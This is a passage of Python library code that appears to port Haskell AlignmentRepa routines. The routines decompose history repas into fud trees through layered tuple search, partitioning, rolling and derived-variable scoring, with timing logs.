            t6 = timer()
            dervarser_log.info("dervarser\tsearched: %d\trate: %.2f" % (s5,s5/(t6-t5)))
            dervarser_log.info("<<< dervarser %.3fs" % (t6-t5))
            layerer_log.info( "<<< layer %.3fs" % (t6-t1))
            stdout.flush()
            if l <= lmax and (len(mm) == 0 or maxr(mm1) > maxr(mm) + repaRounding):
                # Recurse only while alignment improves beyond rounding;
                # drop large intermediates first to reduce peak memory.
                (ffr,ll0,ll,ll1) = (None,None,None,None)
                (x2,x3,x4) = (None,None,None)
                return layer(vv,uu1,gg,mm1,xx1,xxp1,xxrr1,xxrrp1,f,l+1)
        else:
            t5 = timer()
            applier_log.info("<<< application %.3fs" % (t5-t4))
            layerer_log.info( "<<< layer %.3fs" % (t5-t1))
            stdout.flush()
        return (uu,ff,mm)
    layerer_log.info(">>> layerer")
    t1 = timer()
    # Start from the empty fud at layer 1.
    x1 = layer(vv,uu,fudEmpty(),[],xx,xxp,xxrr,xxrrp,f,1)
    t2 = timer()
    layerer_log.info("<<< layerer %.3fs" % (t2-t1))
    stdout.flush()
    return x1
# parametersSystemsHistoryRepasDecomperMaxRollByMExcludedSelfHighestFmaxIORepa ::
# Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer ->
# Integer -> Integer ->
# System -> Set.Set Variable -> HistoryRepa ->
# IO (Maybe (System, DecompFud))
def parametersSystemsHistoryRepasDecomperMaxRollByMExcludedSelfHighestFmaxIORepa(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,fmax,mult,seed,uu,vv,aa):
    """Practicable fud decomposition of a history repa.

    Repeatedly runs the max-roll-by-m layerer on the history (and on `mult`
    shuffled copies, used as the independent comparison), then slices the
    history on the induced fud's derived variables and recurses into the
    largest unprocessed slice, growing a tree of (state, fud) pairs.
    Appears to mirror the Haskell AlignmentRepa function named in the
    signature comment above — NOTE(review): the semantics of the Alignment
    primitives (sset, sdict, fuds, transforms, ...) are defined elsewhere
    in this project.

    Returns (system, DecompFud), or None when the search parameters or the
    substrate are invalid.
    """
    repaRounding = 1e-6
    # Short aliases for the Alignment library primitives used below.
    dom = relationsDomain
    def maxd(mm):
        # Maximum element of [(vars, alignment)] returned as
        # (alignment, vars); (0, empty set) when mm is empty.
        if len(mm) > 0:
            return list(sset([(b,a) for (a,b) in mm]))[-1]
        return (0,sset())
    def tsgl(r):
        # Singleton tree rooted at r.
        return sdict([(r,sdict())])
    uvars = systemsSetVar
    acard = histogramsCardinality
    trim = histogramsTrim
    aall = histogramsList
    def red(aa,vv):
        return setVarsHistogramsReduce(vv,aa)
    def unit(ss):
        return setStatesHistogramUnit(sset([ss]))
    aahh = histogramsHistory
    hhhr = systemsHistoriesHistoryRepa
    def vars(hr):
        # Variables of a history repa as a sorted set.
        return sset(historyRepasVectorVar(hr))
    size = historyRepasSize
    rraa = systemsHistogramRepasHistogram
    hrhx = historyRepasRed
    def hrhrred(hr,vv):
        return setVarsHistoryRepasHistoryRepaReduced(vv,hr)
    def hrred(hr,vv):
        return setVarsHistoryRepasReduce(1,vv,hr)
    def reduce(uu,ww,hh):
        # Reduce history repa hh to variables ww and lift to a histogram.
        return rraa(uu,hrred(hh,ww))
    def select(uu,ss,hh):
        # Select the events of hh that are consistent with state ss.
        return historyRepasHistoryRepasHistoryRepaSelection_u(hhhr(uu,aahh(unit(ss))),hh)
    hrconcat = vectorHistoryRepasConcat_u
    hrshuffle = historyRepasShuffle_u
    ffqq = fudsSetTransform
    fder = fudsDerived
    tttr = systemsTransformsTransformRepa_u
    def apply(uu,ff,hh):
        # Apply every transform of fud ff to history repa hh.
        return historyRepasListTransformRepasApply(hh,[tttr(uu,tt) for tt in ffqq(ff)])
    depends = fudsSetVarsDepends
    zzdf = treePairStateFudsDecompFud
    dfzz = decompFudsTreePairStateFud
    def zztrim(df):
        # Drop trailing empty-fud leaves from every path of the tree.
        pp = []
        for ll in treesPaths(df):
            (_,ff) = ll[-1]
            if len(ff) == 0:
                pp.append(ll[:-1])
            else:
                pp.append(ll)
        return pathsTree(pp)
    def layerer(uu,xx,f):
        # Build the shuffled comparison history and the perimeter caches,
        # then delegate to the external layerer for fud f.
        decomper_log.info(">>> repa shuffle")
        stdout.flush()
        t1 = timer()
        z = size(xx)
        xxrr = hrconcat([hrshuffle(xx,seed+i*z) for i in range(1,mult+1)])
        t2 = timer()
        decomper_log.info("<<< repa shuffle %.3fs" % (t2-t1))
        decomper_log.info(">>> repa perimeters")
        stdout.flush()
        t1 = timer()
        xxp = hrhx(xx)
        xxrrp = hrhx(xxrr)
        t2 = timer()
        decomper_log.info("<<< repa perimeters %.3fs" % (t2-t1))
        return parametersSystemsLayererMaxRollByMExcludedSelfHighestIORepa_u(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,uu,vv,xx,xxp,xxrr,xxrrp,f)
    def decomp(uu,zz,qq,f):
        # zz: decomposition tree of (state, fud) nodes built so far;
        # qq: cache mapping each node to its (selected history, reduced
        # derived histogram); f: 1-based fud counter.
        if len(zz) == 0:
            # Root node: layer over the whole history.
            (uur,ffr,nnr) = layerer(uu,aa,f)
            if len(ffr) == 0 or len(nnr) == 0:
                return (uu, decompFudEmpty())
            (ar,kkr) = maxd(nnr)
            if ar <= repaRounding:
                # No alignment above numerical noise: nothing to decompose.
                return (uu, decompFudEmpty())
            decomper_log.info(">>> slicing")
            stdout.flush()
            t3 = timer()
            ffr1 = depends(ffr,kkr)
            decomper_log.info("dependent fud cardinality : %d" % len(ffqq(ffr1)))
            aar = apply(uur,ffr1,aa)
            aa1 = trim(reduce(uur,fder(ffr1),aar))
            decomper_log.info("derived cardinality : %d" % acard(aa1))
            zzr = tsgl((stateEmpty(),ffr1))
            qq[(stateEmpty(),ffr1)] = (aar,aa1)
            # Drop large intermediates before recursing (memory).
            (ffr,nnr,kkr) = (None,None,None)
            t4 = timer()
            decomper_log.info("<<< slicing %.3fs" % (t4-t3))
            stdout.flush()
            return decomp(uur,zzr,qq,f+1)
        if fmax > 0 and f > fmax:
            # Fud budget exhausted: return the trimmed decomposition.
            return (uu,zzdf(zztrim(zz)))
        decomper_log.info(">>> slice selection")
        stdout.flush()
        t1 = timer()
        # Collect every (size, (path, state, history)) slice candidate not
        # already expanded under its node.
        mm = []
        for (nn,yy) in treesPlaces(zz):
            (rr,ff) = nn[-1]
            if len(ff) > 0:
                (bb,bb1) = qq[(rr,ff)]
                tt = dom(treesRoots(yy))
                for (ss,a) in aall(red(bb1,fder(ff))):
                    if a > 0 and ss not in tt:
                        mm.append((a,(nn,ss,bb)))
        decomper_log.info("slices: %d" % len(mm))
        if len(mm) == 0:
            t2 = timer()
            decomper_log.info("<<< slice selection %.3fs" % (t2-t1))
            stdout.flush()
            return (uu,zzdf(zztrim(zz)))
        # Expand the largest slice next.
        mm.sort(key = lambda x: x[0])
        (a,(nn,ss,bb)) = mm[-1]
        cc = hrhrred(select(uu,ss,bb),vars(aa))
        decomper_log.info("decomp path length: %d" % len(nn))
        decomper_log.info("slice size: %d" % a)
        t2 = timer()
        decomper_log.info("<<< slice selection %.3fs" % (t2-t1))
        stdout.flush()
        (uuc,ffc,nnc) = layerer(uu,cc,f)
        decomper_log.info(">>> slicing")
        stdout.flush()
        t3 = timer()
        (ac,kkc) = maxd(nnc)
        ffc1 = fudEmpty()
        if ac > repaRounding:
            ffc1 = depends(ffc,kkc)
        decomper_log.info("dependent fud cardinality : %d" % len(ffqq(ffc1)))
        ccc = apply(uuc,ffc1,cc)
        cc1 = trim(reduce(uuc,fder(ffc1),ccc))
        decomper_log.info("derived cardinality : %d" % acard(cc1))
        qq[(ss,ffc1)] = (ccc,cc1)
        zzc = pathsTree(treesPaths(zz) + [nn+[(ss,ffc1)]])
        # Drop large intermediates before recursing (memory).
        (mm,cc,ffc,nnc,kkc) = (None,None,None,None,None)
        t4 = timer()
        decomper_log.info("<<< slicing %.3fs" % (t4-t3))
        stdout.flush()
        return decomp(uuc,zzc,qq,f+1)
    # Parameter and substrate validation; None signals invalid input.
    if wmax < 0 or lmax < 0 or xmax < 0 or omax < 0 or bmax < 0 or mmax < 1 or umax < 0 or pmax < 0:
        return None
    if size(aa) == 0 or mult < 1:
        return None
    if not (vars(aa).issubset(uvars(uu)) and vv.issubset(vars(aa))):
        return None
    decomper_log.info(">>> decomper")
    t1 = timer()
    x1 = decomp(uu,emptyTree(),sdict(),1)
    decomper_log.info("nodes: %d" % len(treesNodes(dfzz(x1[1]))))
    t2 = timer()
    decomper_log.info("<<< decomper repa %.3fs" % (t2 - t1))
    stdout.flush()
    return x1
# parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u ::
# Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer ->
# System -> Set.Set Variable -> Fud ->
# HistoryRepa -> HistogramRepaRed -> HistoryRepa -> HistogramRepaRed -> Integer -> Integer ->
# IO (System, Fud, [(Set.Set Variable, Double)])
def parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,uu,vvg,ffg,xx,xxp,xxrr,xxrrp,f,g):
    """Level-aware max-roll-by-m layerer over a history repa.

    Grows a fud layer by layer (up to lmax layers): each layer searches for
    aligned tuples (tupler), partitions them (parter), rolls the partitions
    (roller), turns the surviving rolls into new transforms (application),
    and keeps the new layer only if the derived-variable alignment improves
    (dervarser).  vvg/ffg are the level substrate and level fud; f and g
    number the fud and the level node for the new variables' names.
    Appears to mirror the Haskell AlignmentRepa function named in the
    signature comment above.

    Returns (system, fud, [(derived-variable set, alignment)]).
    """
    repaRounding = 1e-6
    def sgl(x):
        return sset([x])
    def maxr(mm):
        # Largest alignment in [(vars, alignment)]; 0 when mm is empty.
        if len(mm) > 0:
            return list(sset([b for (_,b) in mm]))[-1:][0]
        return 0
    # Short aliases for the Alignment library primitives used below.
    uvars = systemsSetVar
    cart = systemsSetVarsSetStateCartesian_u
    lluu = listsSystem_u
    uunion = pairSystemsUnion
    sunion = pairStatesUnionLeft
    ssgl = stateSingleton
    llaa = listsHistogram_u
    hhvvr = historyRepasVectorVar
    apvvr = histogramRepaRedsVectorVar
    hrhx = historyRepasRed
    def unit(qq):
        return llaa([(ss,1) for ss in qq])
    tttr = systemsTransformsTransformRepa_u
    apply = historyRepasListTransformRepasApply_u
    trans = histogramsSetVarsTransform_u
    ttpp = transformsPartition
    und = transformsUnderlying
    qqff = setTransformsFud_u
    ffqq = fudsSetTransform
    def fder(ff):
        # Derived variables of a fud: all transform outputs minus any
        # variable consumed as an underlying input.
        und = transformsUnderlying
        vv = set()
        for (aa,ww) in ff:
            vv |= ww
        for tt in ff:
            vv -= und(tt)
        return vv
    def fund(ff):
        # Underlying variables of a fud: all inputs minus any output.
        und = transformsUnderlying
        vv = set()
        for tt in ff:
            vv |= und(tt)
        for (aa,ww) in ff:
            vv -= ww
        return vv
    def depends(ff,vv):
        # Transforms of ff that (transitively) produce the variables vv.
        und = transformsUnderlying
        dd = dict([(v,(xx,ww)) for (xx,ww) in ff for v in ww])
        yy = set(dd.keys())
        def deps(uu,xx):
            # xx is the visited set, preventing revisits on shared inputs.
            ff = []
            for w in uu & yy - xx:
                tt = dd[w]
                ff.append(tt)
                zz = xx.copy()
                zz.add(w)
                ff = ff + deps(und(tt),zz)
            return ff
        return set(deps(vv,set()))
    def funion(ff,gg):
        return qqff(ffqq(ff) | ffqq(gg))
    def buildfftup(uu,vvg,ffg,ff,hh,hhp,hhrr,hhrrp):
        return parametersSystemsBuilderTupleLevelNoSumlayerMultiEffectiveRepa_ui(xmax,omax,bmax,mmax,uu,vvg,ffg,ff,hh,hhp,hhrr,hhrrp)
    def parter(uu,kk,bb,y1):
        return parametersSystemsPartitionerMaxRollByMRepa_ui(mmax,umax,pmax,uu,kk,bb,y1)
    def roller(qq):
        return parametersRollerMaximumRollExcludedSelfRepa_i(qq)
    def buildffdervar(uu,vv,ffg,ff,xx,xxp,xxrr,xxrrp):
        (x1,s1) = parametersSystemsBuilderDerivedVarsLevelHighestNoSumlayerRepa_ui(wmax,omax,uu,vv,ffg,ff,xx,xxp,xxrr,xxrrp)
        return ([(kk,a) for ((kk,_,_),a) in x1],s1)
    def layer(uu,ff,mm,xx,xxp,xxrr,xxrrp,l):
        # One search layer; recurses with l+1 while the alignment improves.
        if l > lmax:
            return (uu,ff,mm)
        layerer_log.info(">>> layer\tfud: %d\tlevel node: %d\tlayer: %d" % (f,g,l))
        t1 = timer()
        # --- tupler: search for aligned tuples of variables ---
        tupler_log.info(">>> tupler")
        tupler_log.info("level substrate cardinality: %d" % len(vvg))
        tupler_log.info("level fud derived cardinality: %d" % len(fder(ffg)))
        tupler_log.info("fud cardinality: %d" % len(ffqq(ff)))
        tupler_log.info("level excluded fud cardinality: %d" % len(ffqq(ff)-ffqq(ffg)))
        stdout.flush()
        (x2,s2) = buildfftup(uu,vvg,ffg,ff,xx,xxp,xxrr,xxrrp)
        if len(x2) > 0:
            tupler_log.info("tuple cardinality: %d" % len(x2))
            tupler_log.info("max tuple algn: %.2f" % max([b for (a,b) in x2]))
        else:
            tupler_log.info("no tuples")
        t2 = timer()
        tupler_log.info("tupler\tsearched: %d\trate: %.2f" % (s2,s2/(t2-t1)))
        tupler_log.info("<<< tupler %.3fs" % (t2-t1))
        # --- parter: partition each tuple ---
        parter_log.info(">>> parter")
        stdout.flush()
        y3 = [parter(uu,kk,bb,y1) for ((kk,bb),y1) in x2]
        x3 = [x for (ll,_) in y3 for x in ll]
        s3 = sum([s for (_,s) in y3])
        if len(x3) > 0:
            parter_log.info("partitions cardinality: %d" % len(x3))
        else:
            parter_log.info("no tuple partitions")
        t3 = timer()
        parter_log.info("parter\tsearched: %d\trate: %.2f" % (s3,s3/(t3-t2)))
        parter_log.info("<<< parter %.3fs" % (t3-t2))
        # --- roller: roll the partitions ---
        roller_log.info(">>> roller")
        stdout.flush()
        y4 = [roller(qq) for qq in x3]
        x4 = [x for (ll,_) in y4 for x in ll]
        s4 = sum([s for (_,s) in y4])
        if len(x4) > 0:
            roller_log.info("roll cardinality: %d" % len(x4))
        else:
            roller_log.info("no rolls")
        t4 = timer()
        roller_log.info("roller\tsearched: %d\trate: %.2f" % (s4,s4/(t4-t3)))
        roller_log.info("<<< roller %.3fs" % (t4-t3))
        # --- application: turn non-trivial rolls into new transforms ---
        applier_log.info(">>> application")
        stdout.flush()
        ll0 = []
        for (yy,pp) in x4:
            for (jj,p) in zip(yy,pp):
                if max(p) + 1 < len(p):
                    # Roll actually merged values (otherwise it is identity).
                    ii = list(zip(cart(uu,jj),p))
                    ll0.append(ii)
        ll = []
        for (b,ii) in enumerate(ll0):
            # New derived variable named ((fud, level node), layer), index.
            w = VarPair((VarPair((VarPair((VarInt(f),VarInt(g))),VarInt(l))),VarInt(b+1)))
            ww = sset([ValInt(u) for (_,u) in ii])
            tt = trans(unit([sunion(ss,ssgl(w,ValInt(u))) for (ss,u) in ii]),sgl(w))
            ll.append((tt,(w,ww)))
        # Deduplicate: keep a transform only if no earlier-named transform
        # has the same underlying variables and partition.
        ll1 = []
        for (tt,(w,ww)) in ll:
            if all([len(ww) != len(ww1) or und(tt) != und(tt1) or ttpp(tt) != ttpp(tt1) for (tt1,(w1,ww1)) in ll if w > w1]):
                ll1.append((tt,(w,ww)))
        if len(ll1) > 0:
            hh = qqff(sset([tt for (tt,_) in ll1]))
            uu1 = uunion(uu,lluu([(w,ww) for (_,(w,ww)) in ll1]))
            ffr = [tttr(uu1,tt) for (tt,_) in ll1]
            xx1 = apply(xx,ffr)
            xxp1 = hrhx(xx1)
            xxrr1 = apply(xxrr,ffr)
            xxrrp1 = hrhx(xxrr1)
            # Candidate fud: previous fud, the new transforms, plus the
            # level-fud transforms the new ones depend on.
            gg = funion(funion(ff,hh),depends(ffg,fund(hh)))
            applier_log.info("fud cardinality: %d" % len(ffqq(gg)))
            t5 = timer()
            applier_log.info("<<< application %.3fs" % (t5-t4))
            # --- dervarser: score the candidate's derived variables ---
            dervarser_log.info( ">>> dervarser")
            stdout.flush()
            (mm1,s5) = buildffdervar(uu1,vvg,ffg,gg,xx1,xxp1,xxrr1,xxrrp1)
            if len(mm1) > 0:
                dervarser_log.info("der vars algn density: %.2f" % maxr(mm1))
            else:
                dervarser_log.info("no der vars sets")
            t6 = timer()
            dervarser_log.info("dervarser\tsearched: %d\trate: %.2f" % (s5,s5/(t6-t5)))
            dervarser_log.info("<<< dervarser %.3fs" % (t6-t5))
            layerer_log.info( "<<< layer %.3fs" % (t6-t1))
            stdout.flush()
            if l <= lmax and (len(mm) == 0 or maxr(mm1) > maxr(mm) + repaRounding):
                # Improvement: drop intermediates and recurse a layer deeper.
                (ffr,ll0,ll,ll1) = (None,None,None,None)
                (x2,x3,x4) = (None,None,None)
                return layer(uu1,gg,mm1,xx1,xxp1,xxrr1,xxrrp1,l+1)
        else:
            # No new transforms: close the still-open application/layer logs.
            t5 = timer()
            applier_log.info("<<< application %.3fs" % (t5-t4))
            layerer_log.info( "<<< layer %.3fs" % (t5-t1))
            stdout.flush()
        # Either nothing new was produced or the new layer did not improve
        # the alignment: return the previous layer's result.
        return (uu,ff,mm)
    layerer_log.info(">>> layerer")
    t1 = timer()
    x1 = layer(uu,fudEmpty(),[],xx,xxp,xxrr,xxrrp,1)
    t2 = timer()
    layerer_log.info("<<< layerer %.3fs" % (t2-t1))
    stdout.flush()
    return x1
# parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u_1 ::
# Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer ->
# System -> Set.Set Variable -> Fud ->
# HistoryRepa -> HistogramRepaRed -> HistoryRepa -> HistogramRepaRed -> Integer -> Integer ->
# IO (System, Fud, [(Set.Set Variable, Double)])
def parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u_1(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,uu,vvg,ffg,xx,xxp,xxrr,xxrrp,f,g):
    """Earlier (`_1`) variant of the level-aware max-roll-by-m layerer.

    Identical in structure to
    parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u,
    except that fder/fund/depends are taken from the Alignment library
    (fudsDerived/fudsUnderlying/fudsSetVarsDepends) instead of being
    re-implemented locally.  Appears to be kept for reference — NOTE(review):
    confirm whether this variant is still called anywhere.

    Returns (system, fud, [(derived-variable set, alignment)]).
    """
    repaRounding = 1e-6
    def sgl(x):
        return sset([x])
    def maxr(mm):
        # Largest alignment in [(vars, alignment)]; 0 when mm is empty.
        if len(mm) > 0:
            return list(sset([b for (_,b) in mm]))[-1:][0]
        return 0
    # Short aliases for the Alignment library primitives used below.
    uvars = systemsSetVar
    cart = systemsSetVarsSetStateCartesian_u
    lluu = listsSystem_u
    uunion = pairSystemsUnion
    sunion = pairStatesUnionLeft
    ssgl = stateSingleton
    llaa = listsHistogram_u
    hhvvr = historyRepasVectorVar
    apvvr = histogramRepaRedsVectorVar
    hrhx = historyRepasRed
    def unit(qq):
        return llaa([(ss,1) for ss in qq])
    tttr = systemsTransformsTransformRepa_u
    apply = historyRepasListTransformRepasApply_u
    trans = histogramsSetVarsTransform_u
    ttpp = transformsPartition
    und = transformsUnderlying
    qqff = setTransformsFud_u
    ffqq = fudsSetTransform
    fund = fudsUnderlying
    fder = fudsDerived
    depends = fudsSetVarsDepends
    def funion(ff,gg):
        return qqff(ffqq(ff) | ffqq(gg))
    def buildfftup(uu,vvg,ffg,ff,hh,hhp,hhrr,hhrrp):
        return parametersSystemsBuilderTupleLevelNoSumlayerMultiEffectiveRepa_ui(xmax,omax,bmax,mmax,uu,vvg,ffg,ff,hh,hhp,hhrr,hhrrp)
    def parter(uu,kk,bb,y1):
        return parametersSystemsPartitionerMaxRollByMRepa_ui(mmax,umax,pmax,uu,kk,bb,y1)
    def roller(qq):
        return parametersRollerMaximumRollExcludedSelfRepa_i(qq)
    def buildffdervar(uu,vv,ffg,ff,xx,xxp,xxrr,xxrrp):
        (x1,s1) = parametersSystemsBuilderDerivedVarsLevelHighestNoSumlayerRepa_ui(wmax,omax,uu,vv,ffg,ff,xx,xxp,xxrr,xxrrp)
        return ([(kk,a) for ((kk,_,_),a) in x1],s1)
    def layer(uu,ff,mm,xx,xxp,xxrr,xxrrp,l):
        # One search layer; recurses with l+1 while the alignment improves.
        if l > lmax:
            return (uu,ff,mm)
        layerer_log.info(">>> layer\tfud: %d\tlevel node: %d\tlayer: %d" % (f,g,l))
        t1 = timer()
        # --- tupler ---
        tupler_log.info(">>> tupler")
        tupler_log.info("level substrate cardinality: %d" % len(vvg))
        tupler_log.info("level fud derived cardinality: %d" % len(fder(ffg)))
        tupler_log.info("fud cardinality: %d" % len(ffqq(ff)))
        tupler_log.info("level excluded fud cardinality: %d" % len(ffqq(ff)-ffqq(ffg)))
        stdout.flush()
        (x2,s2) = buildfftup(uu,vvg,ffg,ff,xx,xxp,xxrr,xxrrp)
        if len(x2) > 0:
            tupler_log.info("tuple cardinality: %d" % len(x2))
            tupler_log.info("max tuple algn: %.2f" % max([b for (a,b) in x2]))
        else:
            tupler_log.info("no tuples")
        t2 = timer()
        tupler_log.info("tupler\tsearched: %d\trate: %.2f" % (s2,s2/(t2-t1)))
        tupler_log.info("<<< tupler %.3fs" % (t2-t1))
        # --- parter ---
        parter_log.info(">>> parter")
        stdout.flush()
        y3 = [parter(uu,kk,bb,y1) for ((kk,bb),y1) in x2]
        x3 = [x for (ll,_) in y3 for x in ll]
        s3 = sum([s for (_,s) in y3])
        if len(x3) > 0:
            parter_log.info("partitions cardinality: %d" % len(x3))
        else:
            parter_log.info("no tuple partitions")
        t3 = timer()
        parter_log.info("parter\tsearched: %d\trate: %.2f" % (s3,s3/(t3-t2)))
        parter_log.info("<<< parter %.3fs" % (t3-t2))
        # --- roller ---
        roller_log.info(">>> roller")
        stdout.flush()
        y4 = [roller(qq) for qq in x3]
        x4 = [x for (ll,_) in y4 for x in ll]
        s4 = sum([s for (_,s) in y4])
        if len(x4) > 0:
            roller_log.info("roll cardinality: %d" % len(x4))
        else:
            roller_log.info("no rolls")
        t4 = timer()
        roller_log.info("roller\tsearched: %d\trate: %.2f" % (s4,s4/(t4-t3)))
        roller_log.info("<<< roller %.3fs" % (t4-t3))
        # --- application ---
        applier_log.info(">>> application")
        stdout.flush()
        ll0 = []
        for (yy,pp) in x4:
            for (jj,p) in zip(yy,pp):
                if max(p) + 1 < len(p):
                    # Roll actually merged values (otherwise it is identity).
                    ii = list(zip(cart(uu,jj),p))
                    ll0.append(ii)
        ll = []
        for (b,ii) in enumerate(ll0):
            # New derived variable named ((fud, level node), layer), index.
            w = VarPair((VarPair((VarPair((VarInt(f),VarInt(g))),VarInt(l))),VarInt(b+1)))
            ww = sset([ValInt(u) for (_,u) in ii])
            tt = trans(unit([sunion(ss,ssgl(w,ValInt(u))) for (ss,u) in ii]),sgl(w))
            ll.append((tt,(w,ww)))
        # Deduplicate against earlier-named equivalent transforms.
        ll1 = []
        for (tt,(w,ww)) in ll:
            if all([len(ww) != len(ww1) or und(tt) != und(tt1) or ttpp(tt) != ttpp(tt1) for (tt1,(w1,ww1)) in ll if w > w1]):
                ll1.append((tt,(w,ww)))
        if len(ll1) > 0:
            hh = qqff(sset([tt for (tt,_) in ll1]))
            uu1 = uunion(uu,lluu([(w,ww) for (_,(w,ww)) in ll1]))
            ffr = [tttr(uu1,tt) for (tt,_) in ll1]
            xx1 = apply(xx,ffr)
            xxp1 = hrhx(xx1)
            xxrr1 = apply(xxrr,ffr)
            xxrrp1 = hrhx(xxrr1)
            # Candidate fud plus the level-fud transforms it depends on.
            gg = funion(funion(ff,hh),depends(ffg,fund(hh)))
            applier_log.info("fud cardinality: %d" % len(ffqq(gg)))
            t5 = timer()
            applier_log.info("<<< application %.3fs" % (t5-t4))
            # --- dervarser ---
            dervarser_log.info( ">>> dervarser")
            stdout.flush()
            (mm1,s5) = buildffdervar(uu1,vvg,ffg,gg,xx1,xxp1,xxrr1,xxrrp1)
            if len(mm1) > 0:
                dervarser_log.info("der vars algn density: %.2f" % maxr(mm1))
            else:
                dervarser_log.info("no der vars sets")
            t6 = timer()
            dervarser_log.info("dervarser\tsearched: %d\trate: %.2f" % (s5,s5/(t6-t5)))
            dervarser_log.info("<<< dervarser %.3fs" % (t6-t5))
            layerer_log.info( "<<< layer %.3fs" % (t6-t1))
            stdout.flush()
            if l <= lmax and (len(mm) == 0 or maxr(mm1) > maxr(mm) + repaRounding):
                # Improvement: drop intermediates and recurse a layer deeper.
                (ffr,ll0,ll,ll1) = (None,None,None,None)
                (x2,x3,x4) = (None,None,None)
                return layer(uu1,gg,mm1,xx1,xxp1,xxrr1,xxrrp1,l+1)
        else:
            # No new transforms: close the still-open application/layer logs.
            t5 = timer()
            applier_log.info("<<< application %.3fs" % (t5-t4))
            layerer_log.info( "<<< layer %.3fs" % (t5-t1))
            stdout.flush()
        # No improvement or nothing new: keep the previous layer's result.
        return (uu,ff,mm)
    layerer_log.info(">>> layerer")
    t1 = timer()
    x1 = layer(uu,fudEmpty(),[],xx,xxp,xxrr,xxrrp,1)
    t2 = timer()
    layerer_log.info("<<< layerer %.3fs" % (t2-t1))
    stdout.flush()
    return x1
# parametersSystemsHistoryRepasDecomperLevelMaxRollByMExcludedSelfHighestFmaxIORepa ::
# Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer ->
# Integer -> Integer ->
# System -> Tree (Integer, Set.Set Variable, Fud) -> HistoryRepa ->
# IO (Maybe (System, DecompFud))
def parametersSystemsHistoryRepasDecomperLevelMaxRollByMExcludedSelfHighestFmaxIORepa(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,fmax,mult,seed,uu,zzg,aa):
    """Level-tree fud decomposition of a history repa.

    Like the non-level decomper, but the substrate is a tree zzg of level
    nodes (wmax, substrate variables, level fud); `level` recurses through
    that tree, running the level layerer at each node and accumulating the
    induced fuds, before the result is used to slice the history.  Appears
    to mirror the Haskell AlignmentRepa function named in the signature
    comment above.

    Returns (system, DecompFud), or None for invalid parameters/substrate.
    """
    repaRounding = 1e-6
    # Short aliases for the Alignment library primitives used below.
    dom = relationsDomain
    def maxd(mm):
        # Maximum of [(vars, alignment)] as (alignment, vars).
        if len(mm) > 0:
            return list(sset([(b,a) for (a,b) in mm]))[-1]
        return (0,sset())
    def tsgl(r):
        # Singleton tree rooted at r.
        return sdict([(r,sdict())])
    uvars = systemsSetVar
    acard = histogramsCardinality
    trim = histogramsTrim
    aall = histogramsList
    def red(aa,vv):
        return setVarsHistogramsReduce(vv,aa)
    def unit(ss):
        return setStatesHistogramUnit(sset([ss]))
    qqff = setTransformsFud_u
    ffqq = fudsSetTransform
    def fder(ff):
        # Derived variables of a fud (local plain-set implementation).
        und = transformsUnderlying
        vv = set()
        for (aa,ww) in ff:
            vv |= ww
        for tt in ff:
            vv -= und(tt)
        return vv
    def fvars(ff):
        # All variables mentioned by the fud's transform histograms.
        vars = histogramsSetVar
        vv = set()
        for (aa,ww) in ff:
            vv |= vars(aa)
        return vv
    def fund(ff):
        # Underlying variables of a fud: inputs minus outputs.
        und = transformsUnderlying
        vv = set()
        for tt in ff:
            vv |= und(tt)
        for (aa,ww) in ff:
            vv -= ww
        return vv
    def funion(ff,gg):
        return qqff(ffqq(ff) | ffqq(gg))
    aahh = histogramsHistory
    hhhr = systemsHistoriesHistoryRepa
    def vars(hr):
        return sset(historyRepasVectorVar(hr))
    size = historyRepasSize
    rraa = systemsHistogramRepasHistogram
    hrhx = historyRepasRed
    def hrhrred(hr,vv):
        return setVarsHistoryRepasHistoryRepaReduced(vv,hr)
    def hrred(hr,vv):
        return setVarsHistoryRepasReduce(1,vv,hr)
    def reduce(uu,ww,hh):
        return rraa(uu,hrred(hh,ww))
    def select(uu,ss,hh):
        # Events of hh consistent with state ss.
        return historyRepasHistoryRepasHistoryRepaSelection_u(hhhr(uu,aahh(unit(ss))),hh)
    hrconcat = vectorHistoryRepasConcat_u
    hrshuffle = historyRepasShuffle_u
    ffqq = fudsSetTransform
    tttr = systemsTransformsTransformRepa_u
    def ltrsort(uu,ff,hr):
        # Topologically sort the fud's transform repas against hr's vars.
        vars = historyRepasVectorVar
        return listVariablesListTransformRepasSort(vars(hr),[tttr(uu,tt) for tt in ffqq(ff)])
    ltrmul = historyRepasListTransformRepasApply_u
    def apply(uu,ff,hr):
        return historyRepasListTransformRepasApply(hr,[tttr(uu,tt) for tt in ffqq(ff)])
    depends = fudsSetVarsDepends
    zzdf = treePairStateFudsDecompFud
    dfzz = decompFudsTreePairStateFud
    def zztrim(df):
        # Drop trailing empty-fud leaves from every path of the tree.
        pp = []
        for ll in treesPaths(df):
            (_,ff) = ll[-1]
            if len(ff) == 0:
                pp.append(ll[:-1])
            else:
                pp.append(ll)
        return pathsTree(pp)
    def okLevel(zzg):
        # Validate every level node against the substrate and the system.
        for (wmaxg,vvg,ffg) in treesElements(zzg):
            if wmaxg < 0:
                return False
            if not vvg.issubset(vars(aa)):
                return False
            if not fvars(ffg).issubset(uvars(uu)):
                return False
            if not fund(ffg).issubset(vars(aa)):
                return False
        return True
    def layerer(wmax,uu,vvg,ffg,xx,f,g):
        # wmax here is the level node's own wmax, shadowing the outer one.
        decomper_log.info(">>> repa shuffle")
        stdout.flush()
        t1 = timer()
        z = size(xx)
        xxrr = hrconcat([hrshuffle(xx,seed+i*z) for i in range(1,mult+1)])
        t2 = timer()
        decomper_log.info("<<< repa shuffle %.3fs" % (t2-t1))
        decomper_log.info(">>> repa perimeters")
        stdout.flush()
        t1 = timer()
        # Apply the level fud (in dependency order) and restrict to the
        # level substrate plus the level fud's derived variables.
        vv1 = fder(ffg) | vvg
